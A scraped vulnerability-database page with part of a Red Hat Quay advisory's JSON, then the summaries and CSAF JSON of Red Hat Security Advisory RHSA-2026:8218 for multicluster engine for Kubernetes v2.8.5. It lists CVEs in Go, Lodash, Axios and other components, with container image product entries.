"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access"
}
]
}
RHSA-2026:8218
Vulnerability from csaf_redhat - Published: 2026-04-15 01:45 - Updated: 2026-04-16 11:09A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.
A flaw was found in database/sql. Concurrent queries can produce unexpected results when a query is cancelled during a Scan method call on returned Rows, creating a race condition. This vulnerability allows an attacker who can initiate and cancel queries to trigger this condition, possibly leading to inconsistent data being returned to the application.
A flaw was found in the archive/tar package in the Go standard library. tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A specially crafted tar archive with a pax header indicating a big number of sparse regions can cause a Go program to try to allocate a large amount of memory, causing an out-of-memory condition and resulting in a denial of service.
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.
A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.
A cross site scripting flaw has been discovered in the npm react-router and @remix-run/router packages. React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "The multicluster engine for Kubernetes 2.8 General Availability release images,\nwhich add new features and enhancements, bug fixes, and updated container images.",
"title": "Topic"
},
{
"category": "general",
"text": "The multicluster engine for Kubernetes v2.8 images\n\nThe multicluster engine for Kubernetes provides the foundational components\nthat are necessary for the centralized management of multiple\nKubernetes-based clusters across data centers, public clouds, and private\nclouds.\n\nYou can use the engine to create new Red Hat OpenShift Container Platform\nclusters or to bring existing Kubernetes-based clusters under management by\nimporting them. After the clusters are managed, you can use the APIs that\nare provided by the engine to distribute configuration based on placement\npolicy.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:8218",
"url": "https://access.redhat.com/errata/RHSA-2026:8218"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-13465",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-47907",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58183",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61729",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-22029",
"url": "https://access.redhat.com/security/cve/CVE-2026-22029"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-29063",
"url": "https://access.redhat.com/security/cve/CVE-2026-29063"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8218.json"
}
],
"title": "Red Hat Security Advisory: multicluster engine for Kubernetes v2.8.5 security update",
"tracking": {
"current_release_date": "2026-04-16T11:09:35+00:00",
"generator": {
"date": "2026-04-16T11:09:35+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:8218",
"initial_release_date": "2026-04-15T01:45:31+00:00",
"revision_history": [
{
"date": "2026-04-15T01:45:31+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-15T01:45:39+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:09:35+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "multicluster engine for Kubernetes 2.8",
"product": {
"name": "multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:multicluster_engine:2.8::el9"
}
}
}
],
"category": "product_family",
"name": "multicluster engine for Kubernetes"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"product_id": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"product_identification_helper": {
"purl": "pkg:oci/addon-manager-rhel9@sha256%3A8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638648"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"product_id": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel9@sha256%3Ab9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774990481"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"product_id": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/backplane-rhel9-operator@sha256%3Abaedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775518980"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-agent-rhel9@sha256%3Ac18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775346065"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-kubevirt-rhel9@sha256%3A384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913637"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-curator-controller-rhel9@sha256%3A5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913604"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-image-set-controller-rhel9@sha256%3A1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913615"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-addon-rhel9@sha256%3A61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913693"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-rhel9@sha256%3Ab0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775441905"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"product_id": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"product_identification_helper": {
"purl": "pkg:oci/clusterclaims-controller-rhel9@sha256%3A1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774918593"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"product_id": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/clusterlifecycle-state-metrics-rhel9@sha256%3Ae9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774925022"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"product_id": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"product_identification_helper": {
"purl": "pkg:oci/console-mce-rhel9@sha256%3A896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775116156"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"product_id": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-rhel9@sha256%3A850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913711"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"product_id": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hive-rhel9@sha256%3Ad2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775259683"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-addon-rhel9-operator@sha256%3Ad2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913832"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-cli-rhel9@sha256%3Ac3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913767"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-rhel9-operator@sha256%3A9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913854"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"product_id": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/image-based-install-rhel9@sha256%3A8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774986989"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"product_id": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-mce-rhel9@sha256%3Abb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913844"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"product_id": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/managed-serviceaccount-rhel9@sha256%3A9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775441911"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"product_id": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/managedcluster-import-controller-rhel9@sha256%3A3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775198475"
}
}
},
{
"category": "product_version",
